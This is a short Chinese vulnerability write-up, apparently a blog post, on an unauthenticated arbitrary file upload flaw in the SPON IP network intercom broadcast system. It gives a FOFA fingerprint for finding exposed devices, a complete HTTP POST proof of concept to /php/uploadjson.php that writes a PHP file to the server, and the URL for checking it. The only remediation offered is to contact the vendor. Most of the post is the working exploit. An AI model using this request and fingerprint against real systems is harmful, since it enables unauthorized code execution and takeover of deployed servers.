世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc

python 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

验证url:

python 复制代码
http://your_ip/lan/2.php

修复建议

联系软件厂商更新至最新安全版本

相关推荐
德福危险1 天前
密码枚举的艺术:靶机练习之midwest
服务器·安全·web安全
cdprinter1 天前
信刻——安全生产音视频录音录像自动刻录备份归档管理系统
安全·自动化·音视频
jieyu11191 天前
uploads-labs靶场通关(2)
web安全·靶场通关
Forfun_tt1 天前
upload-labs pass-19
web安全·网络安全
缘友一世1 天前
文件上传漏洞和绕过技术
web安全·网络安全·渗透测试·文件上传漏洞·开发安全
报错小能手1 天前
linux学习笔记(43)网络编程——HTTPS (补充)
linux·网络·学习
嘉里蓝海1 天前
橙色风暴中的安全守卫者——嘉顺达蓝海的危险品运输启示录
安全
A Runner for leave1 天前
网络与通信安全课程复习汇总3——身份认证
网络·密码学
百锦再1 天前
对前后端分离与前后端不分离(通常指服务端渲染)的架构进行全方位的对比分析
java·开发语言·python·架构·eclipse·php·maven
Blossom.1181 天前
把AI“刻”进玻璃:基于飞秒激光量子缺陷的随机数生成器与边缘安全实战
人工智能·python·单片机·深度学习·神经网络·安全·机器学习